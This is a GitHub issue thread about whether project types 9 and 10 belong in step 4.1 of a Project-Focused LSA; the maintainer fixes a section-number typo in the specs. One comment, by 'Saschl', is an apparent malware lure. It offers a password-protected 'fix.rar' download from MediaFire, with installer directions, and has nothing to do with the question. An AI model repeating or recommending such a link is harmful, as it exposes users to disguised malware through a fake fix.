### ISSUE TITLE
Step 4.1 Clarification - Systemwide vs Project-Focused

### ISSUE THREAD

**Issue by evaripatis** [MollyMcEvilley/LSASampleCode#1225]
Is it correct that ProjectType values of 9 and 10 should not be considered when processing a Project-Focused LSA?  These are left out of the instructions in the specifications, but no mention is included in the "04_01 Get Project Records.sql" file.  The specifications also refer to Section 2.1, which says nothing about not including projects of type 9 and 10 at any point; it only indicates that they are included.  It seems as if the Project-Focused instructions for 4.1 might be accidentally missing these values.  Can you confirm?
![image](https://github.com/user-attachments/assets/353903e0-6624-4195-854d-1bb606e05861)

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by evaripatis** [comment]
???

**Comment by MollyMcEvilley** [comment]
"Section 2.1" is a typo -- parameters for the LSA, including LSAScope, are in Section 3.1 -- which does say:

![image](https://github.com/user-attachments/assets/babdb3b2-09dc-4e82-b15d-633c48ab54f0)
  
So it is still true (and intentional) that records for other project types are never included when **LSAScope** = 2.  I am updating the specs to correct 2.1 to 3.1 and will post shortly.
